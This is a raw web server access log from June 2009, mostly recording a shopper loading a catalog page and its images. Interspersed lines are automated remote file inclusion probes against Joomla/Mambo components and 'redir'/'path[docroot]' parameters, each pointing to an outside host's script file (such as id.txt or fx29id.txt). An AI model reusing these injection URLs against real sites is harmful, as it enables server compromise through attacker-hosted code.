81.196.124.252 - - [04/Jun/2009:01:58:12 -0400] "GET /logs/access_log.Q109051000/index.php?redir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:01:58:13 -0400] "GET /logs/access_log.Q109052900/index.php?redir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:58:17 -0400] "GET /logs/access_log.Q109052100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:58:17 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:58:17 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:58:17 -0400] "GET /logs/access_log.Q109052300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
217.147.29.190 - - [04/Jun/2009:01:58:25 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [04/Jun/2009:01:58:25 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [04/Jun/2009:01:58:25 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:01:58:51 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:01:58:51 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:01:58:52 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:01:58:56 -0400] "GET /logs/access_log.Q109052700/index.php?redir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:01:58:58 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.216.213.145 - - [04/Jun/2009:01:58:58 -0400] "GET /index.php?redir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.216.213.145 - - [04/Jun/2009:01:59:00 -0400] "GET /logs/index.php?redir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.216.213.145 - - [04/Jun/2009:01:59:02 -0400] "GET /logs/access_log.Q108062200/index.php?redir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:02:01:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.50.197.106 - - [04/Jun/2009:02:01:34 -0400] "GET //?path%5Bdocroot%5D=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:02:01:34 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:02:01:34 -0400] "GET /logs//?path%5Bdocroot%5D=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 200 4103 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:02:01:49 -0400] "GET //?path%5Bdocroot%5D=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:02:01:49 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:02:01:49 -0400] "GET /logs//?path%5Bdocroot%5D=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 200 4103 "-" "Mozilla/5.0"
66.74.141.181 - - [04/Jun/2009:02:03:07 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG HTTP/1.1" 200 69904 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:11 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:11 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:12 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:12 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:12 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:12 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:12 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:12 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:12 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:13 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:13 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:13 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:13 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:13 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:13 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:13 -0400] "GET /images/fav_r-a.gif HTTP/1.1" 200 272 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:14 -0400] "GET /images/addtocart.gif HTTP/1.1" 200 591 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:14 -0400] "GET /images/fav_a-a.gif HTTP/1.1" 200 281 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:14 -0400] "GET /images/items/45408501_THUMB.JPG HTTP/1.1" 200 1652 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:14 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:14 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
91.149.157.130 - - [04/Jun/2009:02:03:14 -0400] "GET /logs/error_log.Q109053100//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
66.74.141.181 - - [04/Jun/2009:02:03:15 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:15 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:15 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:15 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:15 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:15 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:17 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:17 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:17 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:17 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:17 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F7400CA287004EEE00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
69.50.197.106 - - [04/Jun/2009:02:03:41 -0400] "GET /logs/access_log.Q108121900%20%20//?path%5Bdocroot%5D=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:02:03:52 -0400] "GET /logs/access_log.Q108121900%20%20//?path%5Bdocroot%5D=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.74.141.181 - - [04/Jun/2009:02:03:54 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:54 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:55 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:55 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:55 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:55 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:55 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:55 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:56 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:56 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:56 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:56 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:56 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:56 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:57 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:57 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:57 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:57 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:57 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:58 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:58 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [04/Jun/2009:02:03:58 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0056F74A03920700265E00F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
